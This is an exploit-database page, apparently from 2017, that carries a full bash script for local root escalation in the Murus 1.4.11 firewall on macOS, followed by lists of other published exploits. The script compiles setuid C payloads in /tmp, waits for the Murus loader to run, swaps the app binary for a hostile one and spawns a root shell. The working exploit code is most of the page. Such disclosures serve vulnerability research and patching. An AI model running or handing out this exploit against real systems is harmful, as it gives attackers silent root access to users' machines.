Menu

Search for hundreds of thousands of exploits

"Murus 1.4.11 - Local Privilege Escalation"

Author

Exploit author

"Mark Wadham"

Platform

Exploit platform

macos

Release date

Exploit published date

2017-12-06

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus
# firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings.

# If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access
# without the user knowing.

# https://m4.rkw.io/murus1.4.11.sh.txt
# 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301
# -------------------------------------------------------------------------------
#!/bin/bash

##################################################################
###### Murus 1.4.11 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html               ######
##################################################################

echo "compiling payloads..."

cat > /tmp/murus411_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
  return 0;
}
EOF

gcc -o /tmp/murus411_exp /tmp/murus411_exp.c

if [ ! $? -eq 0 ] ; then
  rm -f /tmp/murus411_exp.c
	echo "failed to compile, dev tools may not be installed"
  exit 1
fi

rm -f /tmp/murus411_exp.c

cat > /tmp/murus411_exp2.c <<EOF
#include <unistd.h>
#include <stdlib.h>
int main()
{
  setuid(0);
  seteuid(0);
  system("chown root:wheel /tmp/murus411_exp");
  system("chmod 4755 /tmp/murus411_exp");
  system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
Murus.app/Contents/MacOS/Murus");
  execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
  return 0;
}
EOF

gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
rm -f /tmp/murus411_exp2.c

echo "waiting for loader..."

while :
do
  ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
    |grep -v grep 1>/dev/null
  if [ $? -eq 0 ] ; then
    break
  fi
done

echo "planting payload..."

mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
Contents/MacOS/Murus.orig
mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus

echo "waiting for payload to trigger..."

while :
do
  r=`ls -la /tmp/murus411_exp |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
done

echo "kapow"

/tmp/murus411_exp
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-12 "MacOS 320.whatis Script - Privilege Escalation" local macos "Csaba Fitzl"
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-03-20 "VMware Fusion 11.5.2 - Privilege Escalation" local macos "Rich Mirch"
2020-03-17 "VMWare Fusion - Local Privilege Escalation" local macos Grimm
2019-12-18 "macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()" dos macos "Google Security Research"
2019-11-22 "macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache" local macos "Google Security Research"
2019-11-05 "macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()" dos macos "Google Security Research"
2019-11-04 "Apple macOS 10.15.1 - Denial of Service (PoC)" dos macos 08Tc3wBB
2019-10-09 "XNU - Remote Double-Free via Data Race in IPComp Input Path" dos macos "Google Security Research"
2019-09-19 "macOS 18.7.0 Kernel - Local Privilege Escalation" local macos A2nkF
Release Date Title Type Platform Author
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (1)" local macos "Mark Wadham"
2018-01-29 "Arq 5.10 - Local Privilege Escalation (2)" local macos "Mark Wadham"
2017-12-06 "Sera 1.2 - Local Privilege Escalation / Password Disclosure" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.1 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.6 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Arq 5.9.7 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.3 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Murus 1.4.11 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.24 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 5.0.0 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation" local macos "Mark Wadham"
2017-07-18 "Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation" local macos "Mark Wadham"
2017-04-11 "Proxifier for Mac 2.17/2.18 - Privesc Escalation" local macos "Mark Wadham" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected